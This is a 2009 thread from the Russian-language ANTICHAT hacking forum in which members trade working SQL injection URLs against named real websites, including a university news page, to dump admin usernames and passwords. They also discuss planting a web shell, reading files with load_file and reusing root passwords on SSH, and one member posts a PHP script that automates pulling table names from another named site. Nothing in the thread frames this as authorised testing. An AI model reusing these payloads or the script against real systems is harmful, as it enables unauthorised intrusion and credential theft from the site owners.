HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2009, 18:58
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Код:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4,5+from+admin_users--
Spyder, а ТЫ залил шелл? )

Последний раз редактировалось mailbrush; 06.12.2009 в 19:11..
 
Ответить с цитированием

  #2  
Старый 06.12.2009, 19:20
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4,5+from+admin_users--
Spyder, а ТЫ залил шелл? )
сомниваюсь штобы Spyder залил...
каким образом?
через логи?
 
Ответить с цитированием

  #3  
Старый 06.12.2009, 19:22
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Цитата:
Сообщение от 547  
сомниваюсь штобы Spyder залил...
каким образом?
через логи?
А ты не сомневайся
 
Ответить с цитированием

  #4  
Старый 06.12.2009, 19:23
x[0]x
Banned
Регистрация: 02.12.2008
Сообщений: 43
Провел на форуме:
131685

Репутация: 4
По умолчанию

Цитата:
Сообщение от 547  
сомниваюсь штобы Spyder залил...
каким образом?
через логи?
reverse ip => выбирай сайты - читалка у тебя есть.

можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку

хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
)
сложи 1+1 )

http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)

Последний раз редактировалось x[0]x; 06.12.2009 в 19:31..
 
Ответить с цитированием

  #5  
Старый 06.12.2009, 19:44
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от x[0]x  
reverse ip => выбирай сайты - читалка у тебя есть.

можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку

хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
)
сложи 1+1 )

http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)
да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...

mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)

Последний раз редактировалось 547; 06.12.2009 в 19:52..
 
Ответить с цитированием

  #6  
Старый 06.12.2009, 19:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Цитата:
Сообщение от 547  
да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...

mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)
У тебя нету нестандартного мышления
 
Ответить с цитированием

  #7  
Старый 06.12.2009, 19:56
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")

PS:
Код:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,2,3,4,load_file(0x2F746D702F6D61696C6272757368)
 
Ответить с цитированием

  #8  
Старый 06.12.2009, 20:48
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Настройте пожалуйста скрипт.

[/PHP]<?php
set_time_limit(0);
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://www.engelmt.de/en/cataloque/artikelgruppen.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-91 union select 1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name) ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from+information_schema.tables LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='50';//Конечное значение счетчика
$set['h']='www.engelmt.de';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}

?>
 
Ответить с цитированием

  #9  
Старый 06.12.2009, 20:44
MaydDay
Новичок
Регистрация: 21.10.2009
Сообщений: 10
Провел на форуме:
35014

Репутация: 0
По умолчанию

можно что-нибуть выжать или дохлый номер?
http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='
 
Ответить с цитированием

  #10  
Старый 07.12.2009, 08:18
x[0]x
Banned
Регистрация: 02.12.2008
Сообщений: 43
Провел на форуме:
131685

Репутация: 4
По умолчанию

атрибут космический-
бруто технику описывали уже с минимальным количеством запросов
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.